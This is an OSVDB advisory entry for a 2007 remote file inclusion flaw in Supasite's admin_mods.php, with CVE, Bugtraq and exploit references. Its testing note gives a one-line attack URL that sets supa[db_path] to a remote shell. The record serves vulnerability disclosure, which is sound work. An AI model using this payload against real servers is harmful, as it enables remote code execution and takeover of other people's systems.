Supasite admin_mods.php supa[db_path] Variable Remote File Inclusion

2007-04-21T00:00:00
ID OSVDB:38847
Type osvdb
Reporter OSVDB
Modified 2007-04-21T00:00:00

Description

Manual Testing Notes

[Path]/supasite/admin_mods.php?supa[db_path]=Shell

References:

Related OSVDB ID: 38845 Related OSVDB ID: 38848 Related OSVDB ID: 38850 Related OSVDB ID: 38852 Related OSVDB ID: 38854 Related OSVDB ID: 38846 Related OSVDB ID: 38853 Related OSVDB ID: 38849 Related OSVDB ID: 38855 Related OSVDB ID: 38851 ISS X-Force ID: 33796 Generic Exploit URL: http://www.milw0rm.com/exploits/3771 FrSIRT Advisory: ADV-2007-1492 CVE-2007-2185 Bugtraq ID: 23581